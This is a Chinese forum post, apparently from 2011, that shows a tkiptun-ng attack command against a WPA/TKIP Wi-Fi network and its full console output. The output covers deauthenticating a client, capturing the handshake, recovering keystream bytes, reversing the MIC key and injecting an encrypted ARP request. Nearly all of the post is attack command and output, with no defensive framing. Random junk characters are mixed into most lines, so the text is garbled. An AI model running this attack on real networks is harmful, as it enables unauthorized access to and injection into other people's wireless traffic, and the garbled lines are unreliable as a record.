中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入
- ~! \6 g: L; k- y8 _# m
! }8 T. I( s4 Y, Z! b- q2 [5 N) N% T/ P( P$ M
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
* I1 u0 y8 I: b' t+ S: m+ e# }+ y. l; L" F( W/ h
Output: 输出
) t& I) {9 G3 P- A% T
/ K8 z, @% t. O( w The interface MAC (00:0E:2E:C5:81 3) doesn't match the specified MAC (-h).
1 [8 S. g6 } u( E/ C) n4 T& k) G' u- S0 h ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D; i5 m/ W8 Z0 l9 C% R" n
Blub 2:38 E6 38 1C 24 15 1C CF 5 [9 j- c) d2 }# X! d$ ?
Blub 1:17 DD 0D 69 1D C3 1F EE
. |' x3 m8 G2 Q! a Blub 3:29 31 79 E7 E6 CF 8D 5E
& o6 Y; U' p# o+ C 15:06:48 Michael Test: Successful+ m1 h8 `$ R, m- c; T1 _. Y& z
15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9; n& {- j& e; P3 }6 b, z0 W
15:06:48 Found specified AP+ W+ H/ t5 X6 k0 o2 q1 e. e
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs], n0 ], g2 G8 \+ A2 y* _8 N" H
15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]3 r- Y) k" l: o0 A: g# \1 T) n
15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
+ }+ f7 S. [. [. k 15:06:56 Waiting for an ARP packet coming from the Client...
I" ~; ` _/ m- Y( ] Saving chosen packet in replay_src-0305-150705.cap
& B& q5 J9 j4 c 15:07:05 Waiting for an ARP response packet coming from the AP...
# H0 e) A2 y& v, x8 k Saving chosen packet in replay_src-0305-150705.cap
7 `4 y6 z- y: |" i/ c 15:07:05 Got the answer!* ~" q. v7 `5 O1 ^
15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.5 p2 ^% V. v9 T4 `% V2 s0 o+ `
. U6 R: M- A! B6 S( R! c: ]$ B 15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms
0 D; E: g$ a+ s: [! B: V/ E 15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms5 ~0 S6 R" }/ Z
15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms6 \" p; |8 S$ w
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms/ W9 Y- Y, J4 y1 \
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms$ X9 W. ^: [: e' }
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
3 C u! c$ p3 n 15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms& y( Q0 J% r3 U. H/ M3 K
15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms2 T. v: n! D" n* \
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.5 _7 o4 Z- O$ A
15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms- E! p4 s7 Q/ z6 K z; P
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms) q+ t, F# G. |& ~8 X1 d: F7 a
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
! f: ^% L# c& b+ N7 ?! U8 M 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms1 W% _. M& L& x# v I& q* v
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
$ T8 |* w. l3 f3 f7 j3 C Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
3 G0 p0 x# p7 g/ g; x 15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms
+ F$ b6 ]8 h# F) | G' j8 c 15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms
* U( S+ C6 G8 o8 c z 15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
# k, ~4 a& t5 |2 Q' P8 e. V, k. w 15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms# L8 h9 T0 ^+ i+ o
15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms! S: p4 j) E' \8 U7 L G) A
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms
" G2 D1 S& h. C, T% H* V9 |1 ^: ` 15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms
7 Y! @; a# I" P$ K& o 15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
; H9 d. u9 P/ @8 U" g0 n7 {( f 15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms
$ c) x; ~5 M; R5 ]6 X- ` 15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
% m' }& t5 ~7 O& c9 t& i1 | 15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms: c. W. S- p |
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
+ h1 k- d* O+ r1 c, z 15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms% P, c- L+ V% [
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
! _# ^5 c" M) F/ L& s0 B! v 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms
* o; S3 n9 C8 r9 t$ L G/ r 15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms
) _& l% P6 R5 }( S7 l Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down." F% V: O; h4 c$ u. ], J% C
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms
4 f4 g# x: T: g1 x4 ~( k( `9 M 15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
$ w+ E( } {% U4 M* p/ I. O" I 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms
1 J3 C% t: o x" E9 \ r3 ~ Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down./ G/ [& F; T3 B1 C" |8 [+ i r
15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms
2 N3 t6 U D7 Z! V9 |: V9 A 15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
1 G6 G! o) k5 @9 x; }* U9 z Sleeping for 60 seconds.36 bytes still unknown6 L O4 O; d3 {
ARP Reply
# o& K" V. ^7 j/ y( N# e Checking 192.168.x.y8 {1 g- @& G3 t- K. [- e2 j' F
15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66( v H3 h. E: W* B
. N4 P) O h/ d+ Y5 c
Saving plaintext in replay_dec-0305-155411.cap
5 D, L# a2 b' a! Y' T i Saving keystream in replay_dec-0305-155411.xor
! x: E/ X0 F9 s2 o) d' d. }" S 15:54:11 * h0 W9 i6 V8 _' G: {
Completed in 2816s (0.02 bytes/s); ~9 ^ b# V, v
- r5 @; l% l- j7 {8 t 15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
7 Z1 y. V D2 `( U$ h; @ | 15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112/ {! w) S6 i P2 w2 ^ |2 \' Y* ?
15:54:11 Sent encrypted tkip ARP request to the client.
3 \" g2 e) s6 f; j! S 15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|
[复制链接]
IP卡
狗仔卡
发表于 2011-5-16 06:41
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡